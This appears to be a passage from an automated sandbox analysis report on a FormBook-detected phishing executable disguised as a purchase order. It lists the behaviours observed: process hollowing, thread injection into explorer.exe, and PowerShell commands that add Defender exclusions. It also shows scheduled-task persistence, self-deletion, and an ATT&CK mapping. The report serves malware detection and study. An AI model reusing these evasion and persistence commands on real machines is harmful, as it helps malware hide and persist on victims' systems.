          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 4004Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 4004
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 4004
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 4004
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: 210000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: B0000
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E66008Jump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EF3008Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: explorer.exe, 0000000A.00000002.4550116031.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2148393301.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
          Source: explorer.exe, 0000000A.00000002.4551964483.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156688797.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4550116031.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000002.4550116031.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2148393301.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000002.4549252856.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146894369.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
          Source: explorer.exe, 0000000A.00000002.4550116031.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2148393301.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000A.00000000.2162129240.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554886834.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2984822872.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeQueries volume information: C:\Users\user\Desktop\Orden de compra 0307AR24.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeQueries volume information: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_00211A45 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,14_2_00211A45
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter          		1
          Scheduled Task/Job          		812
          Process Injection          		11
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Scheduled Task/Job          		1
          DLL Side-Loading          		1
          Scheduled Task/Job          		11
          Disable or Modify Tools          		LSASS Memory321
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media4
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Shared Modules          		Logon Script (Windows)1
          Abuse Elevation Control Mechanism          		41
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading          		812
          Process Injection          		NTDS41
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Abuse Elevation Control Mechanism          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Obfuscated Files or Information          		DCSync213
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Rundll32          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
          Software Packing          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          DLL Side-Loading          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
